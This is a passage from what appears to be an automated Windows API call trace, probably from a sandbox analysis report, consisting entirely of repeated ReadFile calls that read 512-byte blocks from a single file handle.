lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.165] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.165] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.165] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.165] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.165] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.165] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.165] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.165] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.165] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.165] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.166] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.166] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.166] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.166] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.166] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.166] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.166] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.166] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.166] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.166] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.166] ReadFile (in: hFile=0x58, 
lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.167] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.167] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.167] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.167] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.167] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.167] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.167] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.167] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.167] ReadFile 
(in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.167] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.167] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.168] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.168] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.168] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.168] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.168] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.168] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 
[0193.168] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.168] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.168] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.168] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.168] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.168] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.169] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.169] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.169] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, 
lpOverlapped=0x0) returned 1 [0193.169] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.169] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.169] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.169] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.169] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.169] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.169] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.169] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.169] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, 
lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.170] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.170] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.170] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.170] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.170] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.170] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.170] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.170] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.170] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: 
lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.170] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.170] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.170] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.171] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.171] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.171] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.171] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.171] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.171] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, 
lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.171] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.171] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.171] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.171] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.171] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.171] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.172] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.172] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.172] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.172] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.172] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.172] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.172] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.172] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.172] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.172] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.172] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.172] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.173] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.173] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.173] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.173] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.173] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.173] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.173] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.173] ReadFile (in: hFile=0x58, lpBuffer=0x30ef8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e17c, lpOverlapped=0x0 | out: lpBuffer=0x30ef8c*, lpNumberOfBytesRead=0x30e17c*=0x200, lpOverlapped=0x0) returned 1 [0193.173] ReadFile (in: hFile=0x58, 
